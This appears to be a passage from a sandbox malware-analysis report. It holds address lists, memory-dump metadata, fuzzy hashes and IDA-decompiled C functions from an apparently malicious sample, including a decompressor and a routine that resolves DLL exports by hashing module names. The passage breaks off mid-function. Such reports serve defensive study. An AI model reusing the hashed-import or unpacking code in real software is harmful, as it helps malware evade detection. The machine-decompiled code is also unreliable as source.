0x005d381b
0x005d381e
0x005d3821
0x005d3827
0x005d3846
0x005d384b
0x005d3883
0x005d3883
0x005d3885
0x005d3887
0x005d3889
0x005d3889
0x005d388b
0x005d388b
0x005d388e
0x005d380f
0x005d3813
0x005d3815
0x005d3815
0x005d37f2
0x005d37f2
0x005d37f2
0x005d3891
0x005d3895
0x005d3895
0x005d3897
0x005d3899
0x005d3899
0x005d389e
0x005d38a1
0x005d38a2
0x005d38a4
0x005d38a4
0x005d38a8
0x005d38a8
0x005d38a8
0x005d38aa
0x005d38b1
0x005d38b4
0x005d3942
0x005d3942
0x005d3943
0x005d3947
0x005d394d
0x005d3950
0x005d3956
0x005d3974
0x005d397a
0x005d3986
0x005d398c
0x005d39a1
0x005d39a1
0x005d39a2
0x005d397c
0x005d397e
0x005d397f
0x005d397f
0x00000000
0x005d397f
0x00000000
0x005d3958
0x005d3958
0x005d3959
0x005d3960
0x005d396d
0x005d396f
0x005d396f
0x005d38ba
0x005d38bd
0x005d38bf
0x005d3932
0x00000000
0x005d38c1
0x005d38c4
0x005d38c7
0x005d3935
0x00000000
0x005d38c9
0x005d38cc
0x005d38cf
0x005d393a
0x00000000
0x005d38d1
0x005d38d4
0x005d38d7
0x005d393f
0x005d393f
0x00000000
0x005d38d9
0x005d38dc
0x005d38df
0x005d38e2
0x00000000
0x005d38e4
0x005d38e4
0x005d38e8
0x005d38ea
0x005d38f0
0x005d38f0
0x005d38f3
0x005d38f5
0x005d38f7
0x00000000
0x00000000
0x005d38f9
0x005d38fa
0x005d38fb
0x005d38fd
0x00000000
0x00000000
0x00000000
0x005d38fd
0x005d38f3
0x005d38ff
0x005d3901
0x005d3905
0x005d3908
0x005d390e
0x005d3621
0x005d3625
0x005d362b
0x005d362e
0x005d3652
0x005d365d
0x005d3661
0x005d3661
0x00000000
0x005d3630
0x005d363f
0x005d3981
0x005d3981
0x005d3983
0x005d3983
0x005d3914
0x005d3914
0x005d3919
0x005d391c
0x005d3920
0x005d3649
0x005d364b
0x005d3663
0x005d3663
0x005d3665
0x005d3668
0x005d366e
0x005d3670
0x005d3672
0x005d3687
0x005d368a
0x005d3692
0x005d3696
0x005d369b
0x005d36ad
0x005d36ad
0x005d36b9
0x005d36bc
0x005d36be
0x005d36c0
0x005d36c2
0x005d36c2
0x005d36c5
0x005d36c7
0x005d36cb
0x005d36cb
0x00000000
0x005d3926
0x005d392a
0x005d392c
0x005d36ce
0x005d36ce
0x00000000
0x005d36ce
0x00000000
0x005d3920
0x005d39a5
0x005d39a7
0x005d39aa
0x005d39aa
0x005d39ad
0x005d39ad
0x005d38e2
0x005d38d7
0x005d38cf
0x005d38c7
0x005d38bf
0x00000000
0x005d38b4
0x005d3770
0x005d3767
0x005d373d
0x005d373d
0x00000000
0x005d373d
0x005d372c
0x005d372c
0x00000000
0x005d372c
0x005d39e5
0x005d39e7
0x005d39eb
0x005d39ee
0x005d39f0
0x00000000
0x005d379b
0x005d379b
0x005d37a4
0x005d37a6
0x005d37aa
0x005d37ac
0x005d37ac
0x005d39cd
0x005d39d1
0x005d39d5
0x005d39d9
0x005d39dd
0x005d39e1
0x00000000
0x005d39af
0x005d39af
0x005d39b2
0x005d39b5
0x005d39b9
0x005d39bd
0x005d39c1
0x005d39c1
0x00000000
0x005d39cb
0x005d39f4
0x005d39f6
0x005d39fe
0x005d3a00
0x005d3a15
0x005d3a18
0x005d3a1f
0x005d3a22
0x005d3a2d
0x005d3a30
0x005d3a33
0x005d3a39
0x005d3a3b
0x005d3a56
0x005d3a5b
0x005d3a60
0x005d3a64
0x005d3a67
0x005d3a67
0x005d3a6d
0x005d3a6e
0x005d3a6e
0x005d3a76
0x005d3a76
0x005d3a78
0x005d3a7b
0x005d3a7f
0x005d3a7f
0x005d3a24
0x005d3a28
0x005d3a2a
0x005d3a2a
0x005d3a1a
0x005d3a1a
0x005d3a1a
0x005d3a0a
0x005d3a0c
0x005d3a11
0x005d3a11
0x005d3a84
0x005d3a86
0x005d3a88
0x005d3a8a
0x005d3a8d
0x005d3a8f
0x005d3a90
0x005d3a90
0x005d3a93
0x005d3a99
0x005d3a99
0x005d3a9b
0x005d3aa0
0x005d3aa9
0x005d3ab4

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e2dacaa7aeba0b4f596d5ac52d30f7cae44ded1dbb400a95ac22fa8a18c5141
Instruction ID: 27cb10d76fb471d2dcdb351f9027f008b43f2c09bc4f829d59472a899eb0c7ca
Opcode Fuzzy Hash: 1e2dacaa7aeba0b4f596d5ac52d30f7cae44ded1dbb400a95ac22fa8a18c5141
Instruction Fuzzy Hash: 90E1A0716082859FC725CF2CC49056ABFE2FB95310F588A6FE4C58B346E371AE46C752

Uniqueness

Uniqueness Score: -1.00%

Function 005C2E60, Relevance: .3, Instructions: 298
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E005C2E60() {
				signed char _t81;
				intOrPtr* _t85;
				signed int _t91;
				signed int _t103;
				void* _t105;
				void* _t106;
				signed char _t107;
				signed char _t111;
				signed short* _t117;
				intOrPtr* _t121;
				signed int _t127;
				void* _t130;
				signed char _t131;
				void* _t133;
				signed int _t134;
				void* _t136;
				void* _t137;
				intOrPtr* _t138;
				signed int _t145;
				signed int _t146;
				void* _t151;
				signed int _t152;
				signed int _t154;
				signed int _t155;
				void* _t156;
				void* _t158;
				void* _t160;
				void* _t167;
				signed int _t168;
				void* _t170;
				signed int _t172;
				signed int _t173;
				signed int _t175;
				signed int _t178;
				void* _t182;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t187;
				signed int _t188;
				signed short* _t189;
				signed short* _t190;
				signed short* _t191;
				signed short* _t192;
				void* _t193;
				void* _t195;
				signed int _t198;
				signed short* _t201;
				signed int _t202;
				signed int _t203;
				signed short* _t204;
				void* _t209;
				signed int* _t211;

				_t190 = _t211[8];
				_t134 = _t211[0xa];
				 *(_t211[0xb]) = 0;
				_t81 =  *_t190 & 0x000000ff;
				if(_t81 < 0x12) {
					_t204 = _t190;
					goto L8;
				} else {
					_t175 = _t81 - 0x11;
					_t204 =  &(_t190[0]);
					if(_t175 >= 4) {
						_t189 = _t190 + _t81 - 0x10;
						_t203 = _t211[0xa];
						_t133 = 0;
						do {
							 *((char*)(_t203 + _t133)) =  *((intOrPtr*)(_t204 + _t133));
							_t133 = _t133 + 1;
						} while (_t175 != _t133);
						_t172 = _t175 + _t203;
						_t201 = _t189;
						L27:
						_t146 =  *_t201 & 0x000000ff;
						if(_t146 <= 0xf) {
							_t192 =  &(_t201[1]);
							_t121 = _t172 - (_t146 >> 2) + 0xfffff7ff - ((_t201[0] & 0x000000ff) << 2);
							 *_t172 =  *_t121;
							 *((char*)(_t172 + 1)) =  *((intOrPtr*)(_t121 + 1));
							 *(_t172 + 2) =  *((intOrPtr*)(_t121 + 2));
							_t173 = _t172 + 3;
							L30:
							_t204 = _t192;
							L60:
							_t134 = _t173;
							_t175 =  *(_t204 - 2) & 3;
							if(_t175 == 0) {
								_t81 =  *_t204;
								L8:
								_t191 =  &(_t204[0]);
								_t146 = _t81 & 0x000000ff;
								if(_t81 > 0xf) {
									goto L31;
								} else {
									if(_t146 == 0) {
										_t131 =  *_t191;
										if(_t131 == 0) {
											_t170 = 0;
											do {
												_t131 = _t204[1];
												_t170 = _t170 + 0xff;
												_t204 =  &(_t204[0]);
											} while (_t131 == 0);
										}
										_t146 = 0 + (_t131 & 0x000000ff) + 0xf;
										_t191 =  &(_t204[1]);
									}
									_t172 = _t134 + 4;
									_t209 = _t146 - 1;
									 *_t134 =  *_t191;
									_t117 = _t191;
									_t201 =  &(_t191[2]);
									if(_t209 != 0) {
										 *_t211 = _t117;
										if(_t209 <= 3) {
											_t186 = 0;
											_t167 = _t146 + 3;
											 *_t211 =  *_t211 + _t146 + 3;
											do {
												 *((char*)(_t172 + _t186)) =  *((intOrPtr*)(_t201 + _t186));
												_t186 = _t186 + 1;
											} while (_t209 != _t186);
											_t201 =  *_t211;
											goto L25;
										} else {
											_t168 = _t146 + 0xfffffffb;
											_t187 = 4;
											_t127 = _t168 & 0xfffffffc;
											_t202 = _t127;
											_t211[2] = _t127 + 8;
											_t178 =  *_t211;
											_t211[1] = _t178 + _t127 + 8;
											do {
												_t209 = _t209 + 0xfffffffc;
												 *((intOrPtr*)(_t134 + _t187)) =  *((intOrPtr*)(_t178 + _t187));
												_t187 = _t187 + 4;
											} while (_t209 > 3);
											_t134 = _t134 + _t211[2];
											_t167 = _t168 - _t202;
											if(_t167 != 0) {
												_t188 = _t211[1];
												_t130 = 0;
												_t201 = _t188 + _t167;
												do {
													 *((char*)(_t134 + _t130)) =  *((intOrPtr*)(_t188 + _t130));
													_t130 = _t130 + 1;
												} while (_t167 != _t130);
												L25:
												_t145 = _t134 + _t167;
											} else {
												_t201 = _t211[1];
											}
										}
										_t172 = _t145;
									}
									goto L27;
								}
								goto L32;
							} else {
								goto L61;
							}
							L66:
						} else {
							_t191 =  &(_t201[0]);
						}
					} else {
						_t134 = _t211[0xa];
						L61:
						_t193 = _t175 - 1;
						_t151 = 0;
						do {
							 *((char*)(_t134 + _t151)) =  *((intOrPtr*)(_t204 + _t151));
							_t151 = _t151 + 1;
						} while (_t175 != _t151);
						_t146 =  *(_t204 + _t175) & 0x000000ff;
						_t134 = _t134 + _t175;
						_t191 = _t204 + _t193 + 2;
						L31:
						_t172 = _t134;
					}
				}
				L32:
				if(_t146 >= 0x40) {
					_t152 = (_t146 >> 5) - 1;
					_t204 =  &(_t191[0]);
					_t138 = _t172 - (_t146 >> 0x00000002 & 0x00000007) - 1 - (( *_t191 & 0x000000ff) << 3);
					L57:
					_t60 = _t152 + 2; // 0x2
					_t182 = _t60;
					_t195 = 0;
					 *_t172 =  *_t138;
					 *((char*)(_t172 + 1)) =  *((intOrPtr*)(_t138 + 1));
					do {
						 *((char*)(_t172 + _t195 + 2)) =  *((intOrPtr*)(_t138 + _t195 + 2));
						_t195 = _t195 + 1;
					} while (_t152 != _t195);
					_t173 = _t172 + _t182;
					goto L60;
				}
				if(_t146 >= 0x20) {
					_t152 = _t146 & 0x0000001f;
					if(_t152 == 0) {
						_t111 =  *_t191;
						if(_t111 == 0) {
							_t160 = 0;
							do {
								_t111 = _t191[0];
								_t160 = _t160 + 0xff;
								_t191 =  &(_t191[0]);
							} while (_t111 == 0);
						}
						_t191 =  &(_t191[0]);
						_t152 = 0 + (_t111 & 0x000000ff) + 0x1f;
					}
					_t204 =  &(_t191[1]);
					_t138 = _t172 - (( *_t191 & 0x0000ffff) >> 2) - 1;
					L49:
					if(_t152 < 6 || _t172 - _t138 < 4) {
						goto L57;
					} else {
						_t185 = _t152 - 2;
						_t155 = _t152 + 0xfffffffa;
						 *_t172 =  *_t138;
						_t103 = _t155 & 0xfffffffc;
						 *_t211 = _t103;
						_t211[1] = _t138 + _t103 + 8;
						_t105 = 4;
						_t211[2] = _t103 + 8;
						do {
							_t185 = _t185 + 0xfffffffc;
							 *((intOrPtr*)(_t172 + _t105)) =  *((intOrPtr*)(_t138 + _t105));
							_t105 = _t105 + 4;
						} while (_t185 > 3);
						_t173 = _t172 + _t211[2];
						_t156 = _t155 -  *_t211;
						if(_t156 != 0) {
							_t198 = _t211[1];
							_t106 = 0;
							do {
								 *((char*)(_t173 + _t106)) =  *((intOrPtr*)(_t198 + _t106));
								_t106 = _t106 + 1;
							} while (_t156 != _t106);
							_t173 = _t173 + _t156;
						}
					}
					goto L60;
				}
				if(_t146 < 0x10) {
					_t192 =  &(_t191[0]);
					_t85 = _t172 - (_t146 >> 2) - 1 - (( *_t191 & 0x000000ff) << 2);
					 *_t172 =  *_t85;
					 *((char*)(_t172 + 1)) =  *((intOrPtr*)(_t85 + 1));
					_t173 = _t172 + 2;
					goto L30;
				}
				_t136 = _t172 - ((_t146 & 0x00000008) << 0xb);
				_t152 = _t146 & 0x00000007;
				if(_t152 == 0) {
					_t107 =  *_t191;
					if(_t107 == 0) {
						_t158 = 0;
						do {
							_t107 = _t191[0];
							_t158 = _t158 + 0xff;
							_t191 =  &(_t191[0]);
						} while (_t107 == 0);
					}
					_t191 =  &(_t191[0]);
					_t152 = 0 + (_t107 & 0x000000ff) + 7;
				}
				_t91 = _t211[8];
				_t184 = _t211[9] + _t91;
				_t137 = _t136 - (( *_t191 & 0x0000ffff) >> 2);
				_t204 =  &(_t191[1]);
				if(_t137 != _t172) {
					_t138 = _t137 + 0xffffc000;
					goto L49;
				}
				_t154 = (_t91 & 0xffffff00 | _t204 - _t184 >= 0x00000000) << 0x00000002 & 0x000000ff | 0xfffffff8;
				_t95 =  !=  ? _t154 : 0;
				 *(_t211[0xb]) = _t172 - _t211[0xa];
				return  !=  ? _t154 : 0;
				goto L66;
			}

0x005c2e6b
0x005c2e6f
0x005c2e73
0x005c2e79
0x005c2e7f
0x005c2e95
0x00000000
0x005c2e81
0x005c2e81
0x005c2e84
0x005c2e8a
0x005c2e99
0x005c2e9d
0x005c2ea1
0x005c2ea3
0x005c2ea7
0x005c2eaa
0x005c2eab
0x005c2eaf
0x005c2eb1
0x005c2f81
0x005c2f81
0x005c2f87
0x005c2f97
0x005c2fa2
0x005c2fa6
0x005c2fab
0x005c2fb1
0x005c2fb4
0x005c2fb7
0x005c2fb7
0x005c3102
0x005c3102
0x005c3108
0x005c310d
0x005c2eb8
0x005c2ebb
0x005c2ebb
0x005c2ebe
0x005c2ec3
0x00000000
0x005c2ec9
0x005c2ecb
0x005c2ecd
0x005c2ed3
0x005c2ed5
0x005c2ed7
0x005c2ed7
0x005c2eda
0x005c2ee0
0x005c2ee1
0x005c2ed7
0x005c2eeb
0x005c2eef
0x005c2eef
0x005c2ef5
0x005c2ef8
0x005c2ef9
0x005c2efb
0x005c2efd
0x005c2f00
0x005c2f05
0x005c2f08
0x005c2f4d
0x005c2f53
0x005c2f56
0x005c2f59
0x005c2f5c
0x005c2f5f
0x005c2f60
0x005c2f64
0x00000000
0x005c2f0a
0x005c2f0a
0x005c2f0d
0x005c2f14
0x005c2f1a
0x005c2f1c
0x005c2f20
0x005c2f27
0x005c2f2b
0x005c2f2e
0x005c2f31
0x005c2f34
0x005c2f37
0x005c2f3c
0x005c2f40
0x005c2f42
0x005c2f69
0x005c2f6d
0x005c2f6f
0x005c2f72
0x005c2f75
0x005c2f78
0x005c2f79
0x005c2f7d
0x005c2f7d
0x005c2f44
0x005c2f44
0x005c2f44
0x005c2f42
0x005c2f7f
0x005c2f7f
0x00000000
0x005c2f00
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x005c2f89
0x005c2f89
0x005c2f89
0x005c2e8c
0x005c2e8c
0x005c3113
0x005c3113
0x005c3116
0x005c3118
0x005c311c
0x005c311f
0x005c3120
0x005c3124
0x005c3129
0x005c312b
0x005c2fbe
0x005c2fbe
0x005c2fbe
0x005c2e8a
0x005c2fc0
0x005c2fc3
0x005c2fd3
0x005c2fd4
0x005c2fdf
0x005c30e4
0x005c30e6
0x005c30e6
0x005c30e9
0x005c30eb
0x005c30f0
0x005c30f3
0x005c30f7
0x005c30fb
0x005c30fc
0x005c3100
0x00000000
0x005c3100
0x005c2fe9
0x005c2feb
0x005c2fee
0x005c2ff0
0x005c2ff6
0x005c2ff8
0x005c2ffa
0x005c2ffa
0x005c2ffd
0x005c3003
0x005c3004
0x005c2ffa
0x005c300b
0x005c300c
0x005c300c
0x005c3018
0x005c301f
0x005c3081
0x005c3084
0x00000000
0x005c308f
0x005c3091
0x005c3094
0x005c3097
0x005c309b
0x005c30a1
0x005c30a8
0x005c30ac
0x005c30b1
0x005c30b5
0x005c30b8
0x005c30bb
0x005c30be
0x005c30c1
0x005c30c6
0x005c30ca
0x005c30cd
0x005c30cf
0x005c30d3
0x005c30d5
0x005c30d8
0x005c30db
0x005c30dc
0x005c30e0
0x005c30e0
0x005c30cd
0x00000000
0x005c3084
0x005c3025
0x005c313e
0x005c3143
0x005c3147
0x005c314c
0x005c314f
0x00000000
0x005c314f
0x005c3035
0x005c3037
0x005c303a
0x005c303c
0x005c3042
0x005c3044
0x005c3046
0x005c3046
0x005c3049
0x005c304f
0x005c3050
0x005c3046
0x005c3057
0x005c3058
0x005c3058
0x005c305f
0x005c306a
0x005c306c
0x005c3070
0x005c3075
0x005c307b
0x00000000
0x005c307b
0x005c3168
0x005c316d
0x005c3174
0x005c317d
0x00000000

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cea868b4f4202321aabfc81a34691dc5411bae3e380ba442f8620b2556fde1f9
Instruction ID: 16ee118a8349444ff8e044a128ef3d2f03ef39924a453e553561d401efb36a2f
Opcode Fuzzy Hash: cea868b4f4202321aabfc81a34691dc5411bae3e380ba442f8620b2556fde1f9
Instruction Fuzzy Hash: EDA138321083998FCB298FAC8891779BFE1BF5A314F1D86ADD8D6DB343D2249905D790

Uniqueness

Uniqueness Score: -1.00%

Function 005C36E0, Relevance: .2, Instructions: 179
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E005C36E0(intOrPtr _a4, intOrPtr _a8, char _a12) {
				char _v528;
				char _v638;
				char _v789;
				char _v1148;
				char _v1149;
				char _v1150;
				intOrPtr _t51;
				void* _t55;
				char* _t56;
				void* _t57;
				intOrPtr* _t58;
				unsigned int _t59;
				void* _t63;
				signed int _t65;
				void* _t68;
				void* _t69;
				char _t74;
				intOrPtr _t79;
				signed int _t80;
				char _t81;
				char* _t82;
				char _t83;
				char* _t87;
				char* _t91;
				void* _t94;
				short _t95;
				void* _t97;
				signed char _t99;
				intOrPtr* _t101;
				char _t102;
				unsigned int _t103;
				intOrPtr* _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t116;
				intOrPtr _t117;
				signed int _t119;
				void* _t120;
				char _t121;
				void* _t123;
				intOrPtr _t124;
				char* _t125;
				void* _t129;
				intOrPtr* _t130;
				char _t143;
				char _t159;

				_t51 = _a4;
				_t79 = _a8;
				_t101 = _a12;
				_t124 =  *((intOrPtr*)(_t51 + 0x3c));
				_t117 =  *((intOrPtr*)(_t51 + _t124 + 0x78));
				if(_t117 > _t79 || _t117 +  *((intOrPtr*)(_t51 + _t124 + 0x7c)) <= _t79) {
					 *_t101 = _t51 + _t79;
					goto L40;
				} else {
					_t55 = _t51 + _t79;
					_t80 = 0;
					do {
						_t102 =  *((intOrPtr*)(_t55 + _t80));
						 *((char*)(_t129 + _t80 + 0x16f)) = _t102;
						_t80 = _t80 + 1;
					} while (_t102 != 0);
					_t125 =  &_v789;
					do {
						_t56 = _t125;
						_t125 = _t125 + 1;
					} while ( *_t56 != 0x2e);
					 *_t56 = 0;
					_t57 = 0;
					do {
						_t81 =  *((intOrPtr*)(_t129 + _t57 + 0x16f));
						 *((char*)(_t129 + _t57 + 6)) = _t81;
						_t57 = _t57 + 1;
					} while (_t81 != 0);
					_t58 =  &_v1150;
					_t82 =  &_v638;
					while( *_t58 != 0) {
						_t58 = _t58 + 1;
						if(_t58 < _t82) {
							continue;
						}
						break;
					}
					 *_t58 = 0x6c6c642e;
					 *((intOrPtr*)(_t58 + 4)) = 0;
					_t83 = _v1150;
					if(_t83 == 0) {
						L25:
						_t59 = 0;
						L26:
						_t63 = E005C35D0(((_t59 >> 0x0000000b ^ _t59) << 0xf) + (_t59 >> 0x0000000b ^ _t59));
						_t130 = _t129 + 4;
						if(_t63 != 0) {
							L31:
							_t119 =  *_t125;
							_t87 =  &_v1148;
							_t103 = 0;
							 *((short*)(_t87 - 2)) = 1;
							 *_t130 = _t87;
							if(_t119 == 0) {
								L39:
								_t91 =  &_v1150;
								 *((intOrPtr*)(_t91 + 2)) = ((_t103 >> 0x0000000b ^ _t103) << 0xf) + (_t103 >> 0x0000000b ^ _t103);
								_t107 = _t130;
								 *((short*)(_t91 + 6)) = 0;
								 *((intOrPtr*)(_t91 + 8)) = 0;
								 *_t107 = _t91;
								_push( &_a12);
								_push(_t107);
								_push(_t63);
								E005C5F90();
								L40:
								return 1;
							}
							_t94 = 0xffffffffffffffff;
							do {
								_t159 =  *((char*)(_t125 + _t94 + 2));
								_t94 = _t94 + 1;
							} while (_t159 != 0);
							if(_t94 + 1 <= 0) {
								goto L39;
							}
							_t110 = (_t119 << 0x0000000a) + _t119 >> 0x00000006 ^ (_t119 << 0x0000000a) + _t119;
							if(_t94 == 0) {
								L38:
								_t103 = _t110 + _t110 * 8;
								goto L39;
							}
							_t120 = 0;
							do {
								_t74 =  *((char*)(_t125 + _t120 + 1));
								_t120 = _t120 + 1;
								_t110 = (_t74 + _t110 << 0x0000000a) + _t74 + _t110 >> 0x00000006 ^ (_t74 + _t110 << 0x0000000a) + _t74 + _t110;
							} while (_t94 != _t120);
							goto L38;
						}
						_t65 = 0;
						while(1) {
							_t95 =  *((char*)(_t130 + _t65 + 6));
							 *((short*)(_t130 + 0x274 + _t65 * 2)) = _t95;
							if(_t95 == 0) {
								break;
							}
							_t65 = _t65 + 1;
							if(_t65 < 0x200) {
								continue;
							}
							break;
						}
						_t63 = E005CC6D0( &_v528);
						_t130 = _t130 + 4;
						if(_t63 == 0) {
							return 0;
						}
						goto L31;
					}
					_t68 = 0;
					do {
						_t143 =  *((char*)(_t129 + _t68 + 7));
						_t68 = _t68 + 1;
					} while (_t143 != 0);
					if(_t68 <= 0) {
						goto L25;
					}
					if(_t83 == 0) {
						L21:
						_t69 = _t68 - 1;
						_t113 = 0;
						_t97 = 0xffffffffffffffff;
						do {
							_t121 =  *((char*)(_t129 + _t97 + 7));
							_t97 = _t97 + 1;
							_t113 = (_t121 + _t113 << 0x0000000a) + _t121 + _t113 >> 0x00000006 ^ (_t121 + _t113 << 0x0000000a) + _t121 + _t113;
						} while (_t69 != _t97);
						_t59 = _t113 + _t113 * 8;
						goto L26;
					}
					_t116 =  &_v1149;
					_t123 = _t68;
					while(1) {
						_t99 = _t83 + 0xbf;
						if(_t99 <= 0x19) {
							 *(_t116 - 1) = _t99 | 0x00000020;
						}
						if(_t123 < 2) {
							goto L21;
						}
						_t83 =  *_t116;
						_t123 = _t123 - 1;
						_t116 = _t116 + 1;
						if(_t83 != 0) {
							continue;
						}
						goto L21;
					}
					goto L21;
				}
			}

0x005c36ea
0x005c36f1
0x005c36f8
0x005c36ff
0x005c3702
0x005c3708
0x005c37d9
0x00000000
0x005c371a
0x005c371a
0x005c371c
0x005c371e
0x005c371e
0x005c3721
0x005c3728
0x005c3729
0x005c372d
0x005c3734
0x005c3734
0x005c3736
0x005c3737
0x005c373c
0x005c373f
0x005c3741
0x005c3741
0x005c3748
0x005c374c
0x005c374d
0x005c3751
0x005c3755
0x005c375c
0x005c3761
0x005c3764
0x00000000
0x00000000
0x00000000
0x005c3764
0x005c3766
0x005c376c
0x005c3773
0x005c3779
0x005c37e0
0x005c37e0
0x005c37e2
0x005c37f1
0x005c37f6
0x005c37fb
0x005c3831
0x005c3831
0x005c3834
0x005c3838
0x005c383a
0x005c3840
0x005c3845
0x005c388c
0x005c389a
0x005c389e
0x005c38a1
0x005c38a3
0x005c38a9
0x005c38b0
0x005c38b9
0x005c38ba
0x005c38bb
0x005c38bc
0x005c38c4
0x00000000
0x005c38c6
0x005c3849
0x005c384a
0x005c384a
0x005c384f
0x005c384f
0x005c3859
0x00000000
0x00000000
0x005c3867
0x005c386b
0x005c3889
0x005c3889
0x00000000
0x005c3889
0x005c386d
0x005c386f
0x005c386f
0x005c3874
0x005c3883
0x005c3885
0x00000000
0x005c386f
0x005c37fd
0x005c37ff
0x005c37ff
0x005c3807
0x005c380f
0x00000000
0x00000000
0x005c3811
0x005c3817
0x00000000
0x00000000
0x00000000
0x005c3817
0x005c3821
0x005c3826
0x005c382b
0x00000000
0x005c38d2
0x00000000
0x005c382b
0x005c377b
0x005c377d
0x005c377d
0x005c3782
0x005c3782
0x005c3789
0x00000000
0x00000000
0x005c378d
0x005c37b2
0x005c37b2
0x005c37b3
0x005c37b7
0x005c37b8
0x005c37b8
0x005c37bd
0x005c37cc
0x005c37ce
0x005c37d2
0x00000000
0x005c37d2
0x005c378f
0x005c3793
0x005c3795
0x005c3797
0x005c379d
0x005c37a2
0x005c37a2
0x005c37a8
0x00000000
0x00000000
0x005c37aa
0x005c37ac
0x005c37ad
0x005c37b0
0x00000000
0x00000000
0x00000000
0x005c37b0
0x00000000
0x005c3795

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 941cdd162d245afbbf05162c08f474f524392c1396bed88b72cf0b42da7f5da1
Instruction ID: 86ba560eb96a4a743cbf818732a529e7220efc07b37f44e12aa7f450eb86b4ea
Opcode Fuzzy Hash: 941cdd162d245afbbf05162c08f474f524392c1396bed88b72cf0b42da7f5da1
Instruction Fuzzy Hash: 835147B16087454FE318DAA5D895B67FFE6EFC5304F18C47CD48AC7252EA35DA0A8341

Uniqueness

Uniqueness Score: -1.00%

Function 005D41A0, Relevance: .2, Instructions: 179
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E005D41A0(char* _a4, int _a8, signed int* _a12) {
				signed int _v28;
				char _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v44;
				void* _v48;
				void* _v52;
				void* _t47;
				void* _t49;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t73;
				intOrPtr _t79;
				signed int _t83;
				signed int _t85;
				signed int _t86;
				intOrPtr* _t89;
				signed int _t90;
				signed int _t92;
				signed int _t93;
				void* _t94;
				signed int* _t95;
				signed int _t96;
				signed int _t97;
				void* _t99;
				signed int* _t100;

				_t45 = _a4;
				_t73 = 0;
				_v48 = 0;
				_v52 = 0;
				_v40 = 0;
				if(_a4 == 0) {
					L25:
					return _t73;
				}
				_t47 = E005CC380(_t45, 0,  &_v40, _a8);
				_t99 =  &_v40 + 0x10;
				if(_t47 == 0) {
					goto L25;
				}
				_t89 =  &_v32;
				 *_t89 = 0x2f;
				_push(5);
				_push( &_v48);
				_push(_t89);
				_push(_v40);
				_t49 = E005C9FF0();
				_t100 = _t99 + 0x10;
				_t85 = 0;
				_t94 = _t49;
				_t97 = 0;
				_t73 = 0;
				if(_t49 != 5) {
					L12:
					_t50 = _v40;
					 *_t100 = _t85;
					if(_v40 != 0) {
						E005C91E0(_t50);
						_t100 =  &(_t100[1]);
					}
					if(_t94 == 0) {
						L17:
						if(_t97 == 0) {
							L20:
							_t51 = _v48;
							if(_v48 != 0) {
								E005C91E0(_t51);
								_t100 =  &(_t100[1]);
							}
							_t52 = _v52;
							_t95 = _a12;
							if(_v52 != 0) {
								E005C91E0(_t52);
								_t100 =  &(_t100[1]);
							}
							 *_t95 =  *_t100;
							goto L25;
						}
						_t96 = 0;
						do {
							E005C91E0( *((intOrPtr*)(_v52 + _t96 * 4)));
							_t100 =  &(_t100[1]);
							_t96 = _t96 + 1;
						} while (_t97 != _t96);
						goto L20;
					} else {
						_t90 = 0;
						do {
							E005C91E0( *((intOrPtr*)(_v48 + _t90 * 4)));
							_t100 =  &(_t100[1]);
							_t90 = _t90 + 1;
						} while (_t94 != _t90);
						goto L17;
					}
				}
				_t97 = 2;
				_v32 = 0xa000d;
				_v28 = 0;
				_push(2);
				_push( &_v52);
				_push(_t89);
				_push( *((intOrPtr*)(_v48 + 0x10)));
				_t62 = E005C9FF0();
				_t100 =  &(_t100[4]);
				if(_t62 != 2) {
					_t85 = 0;
					_t97 = _t62;
					L11:
					_t73 = 0;
					goto L12;
				}
				_t79 =  *_v52;
				if(_t79 == 0) {
					_t85 = 0;
					__eflags = 0;
					goto L11;
				}
				_t64 = 2;
				_t92 = 0xffffffffffffffff;
				while( *((short*)(_t79 + _t64 - 2)) != 0) {
					_t92 = _t92 - 1;
					_t64 = _t64 + 2;
					if(_t92 != 0x80000000) {
						continue;
					}
					_t85 = 0;
					_t97 = 2;
					goto L11;
				}
				_t73 = 0;
				_t97 = 2;
				__eflags = _t92 - 0xffffffff;
				if(_t92 == 0xffffffff) {
					_t85 = 0;
					goto L12;
				}
				_t65 = E005C3180(_t64, 0);
				_t100 =  &(_t100[2]);
				_t85 = _t65;
				__eflags = _t65;
				if(_t65 == 0) {
					goto L12;
				}
				_t67 =  ~_t92;
				__eflags = _t67;
				if(_t67 <= 0) {
					__eflags = _t92;
					if(_t92 != 0) {
						 *_t85 = 0;
					}
					goto L12;
				}
				_v44 = _t67;
				_t93 = 0;
				 *_t100 = _t85;
				_v36 =  *_v52;
				_t70 =  ~_t85;
				_t73 = 1;
				__eflags = 1;
				while(1) {
